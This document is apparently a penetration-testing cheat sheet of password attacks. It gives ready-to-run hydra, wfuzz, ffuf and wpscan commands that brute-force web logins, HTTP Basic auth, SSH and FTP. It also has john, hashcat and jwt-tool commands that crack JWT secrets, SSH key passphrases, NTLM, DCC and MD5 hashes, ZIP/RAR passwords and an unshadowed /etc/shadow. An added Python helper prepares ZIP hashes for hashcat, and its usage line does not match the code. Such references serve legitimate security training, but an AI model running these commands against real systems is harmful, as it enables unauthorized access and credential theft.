Wordlists:


  • /usr/share/wordlists/rockyou.txt
  • /usr/share/wordlists/seclists/Passwords/Common-Credentials/best1050.txt
  • /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
  • /usr/share/wordlists/metasploit/unix_passwords.txt

HTTP POST Login Page


WFUZZ

wfuzz -c -z file,myWordList -u http://[TARGET_IP]:[TARGET_PORT]/login.php -d "username=FUZZ&password=FUZZ"
Fuzz a POST login form (the same payload is injected at every FUZZ position).


HYDRA

hydra -vV -L myUsersFile.txt -P /usr/share/wordlists/rockyou.txt [TARGET_IP] http-post-form '/path/to/form.php:username=^USER^&password=^PASS^&login=Login:F=ChainNotOK'
Brute force an HTTP POST form with a username list and a password list (F= is the string shown on a failed login).


FFUF

ffuf -w myUsersFile.txt:W1,/usr/share/wordlists/rockyou.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://[TARGET_IP]/login -fc 200
Brute force an HTTP POST form with a username list (W1) and a password list (W2); -fc 200 filters out responses with the failed-login status code.


WPSCAN (WordPress)

wpscan --url http://[TARGET_IP]/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt
Brute force WordPress user's credentials.

HTTP Basic Access Auth


HYDRA

hydra -vV -l myUser -P /usr/share/wordlists/rockyou.txt [TARGET_IP] http-get /path/
Brute Force HTTP Basic Access Authentication.

JWT


JOHN

john --format=HMAC-SHA512 --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt
Crack the JWT secret (HS512 token; use --format=HMAC-SHA256 for HS256).

john --show --format=HMAC-SHA512 jwt.txt
Display the cracked secret.

JWT-CRACKER

jwt-cracker [myToken] [myAlphabet] [myMaxSecretLengthExpected]
Brute force the JWT secret over an alphabet.

Default alphabet: abcdefghijklmnopqrstuvwxyz

JWT_TOOL

jwt_tool [myToken] [myDictionary]
Dictionary attack on the JWT secret.

SSH


HYDRA

hydra -L myUsersFile -P myPassFile [TARGET_IP] ssh
Brute Force SSH.

SSH Private Key Passphrase


JOHN

/usr/share/john/ssh2john.py private_key > forjohn.txt
Prepare private key for John.

john --wordlist=/usr/share/wordlists/rockyou.txt forjohn.txt
Crack private key passphrase.

FTP


HYDRA

hydra -vV -l myUser -P /usr/share/wordlists/rockyou.txt [TARGET_IP] ftp
Brute Force FTP Login.

Linux Unshadow


JOHN

unshadow /etc/passwd /etc/shadow > unshadow.txt
Combine passwd and shadow into one file for John.

john unshadow.txt --wordlist=/usr/share/wordlists/rockyou.txt
Crack user passwords.

john --show unshadow.txt
Display cracked passwords.

MD5


JOHN

john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Crack md5crypt ($1$) hashes; for raw MD5 use --format=Raw-MD5.

NTLM


JOHN

john --format=NT -w=/usr/share/wordlists/rockyou.txt hash.txt --pot=output.txt
Crack NTLM Hash.

DCC


HASHCAT

hashcat -a 0 -m 1100 '15a57c379ebdfea572ad1ff91eb6ef0c:Administrator' /usr/share/wordlists/rockyou.txt
Crack DCC (Domain Cached Credentials) hash.

ZIP


JOHN

zip2john myFile.zip > forjohn.txt
Prepare ZIP archive for John.

john forjohn.txt
Crack ZIP archive password.


HASHCAT

zip2john myFile.zip > forhashcat.txt
Edit forhashcat.txt so that only the hash between $zip2$ and $/zip2$ remains: remove the leading archive/file name prefix and the trailing file name fields.

hashcat -a 0 -m 13600 forhashcat.txt /usr/share/wordlists/rockyou.txt
Crack ZIP archive password.
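Added example (not part of the original cheat sheet): a small Python helper that does the editing step above automatically, reducing each zip2john output line to the bare hash hashcat reads. The sample line and its hex fields are constructed, and the helper names are this example's own.

```python
import re
from typing import List, Optional

# zip2john prints "archive/entry:<hash>:entry:archive::archive"; hashcat wants only <hash>.
# "$zip2$...$/zip2$" is WinZip AES (hashcat -m 13600); "$pkzip2$"/"$pkzip$" is traditional
# PKZIP, whose hashcat mode (172xx) depends on the archive, so it is reported as unknown.
_HASH_RE = re.compile(r"\$(zip2|pkzip2|pkzip)\$.*?\$/\1\$")


def strip_zip2john(line: str) -> Optional[str]:
    """Return only the hash portion of one zip2john output line, or None if absent."""
    match = _HASH_RE.search(line.strip())
    return match.group(0) if match else None


def hashcat_mode(hash_str: str) -> Optional[int]:
    """Map the hash tag to a hashcat mode; None when it cannot be decided from the tag."""
    return 13600 if hash_str.startswith("$zip2$") else None


def convert_for_hashcat(zip2john_output: str) -> List[str]:
    """Convert whole zip2john output (one line per archive entry) into hashcat-ready lines."""
    hashes = []
    for line in zip2john_output.splitlines():
        stripped = strip_zip2john(line)
        if stripped:  # skip blank lines and zip2john diagnostics
            hashes.append(stripped)
    return hashes


# Constructed sample: what zip2john prints for one AES-encrypted entry of myFile.zip.
SAMPLE = (
    "myFile.zip/secret.txt:$zip2$*0*3*0*a1b2c3d4e5f6a7b8*9f8e*4*deadbeef*0011223344556677889900*$/zip2$"
    ":secret.txt:myFile.zip::myFile.zip\n"
)

if __name__ == "__main__":
    for h in convert_for_hashcat(SAMPLE):
        print(h, "-> hashcat -m", hashcat_mode(h))
```

Run it with `zip2john myFile.zip | python3 zip2hashcat.py` style piping by reading stdin instead of SAMPLE.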


FCRACKZIP

fcrackzip -v -D -p /usr/share/wordlists/rockyou.txt -u myZipFile.zip
Crack ZIP archive password.

RAR


JOHN

rar2john myFile.rar > forjohn.txt
Prepare RAR archive for John.

john forjohn.txt
Crack RAR archive password.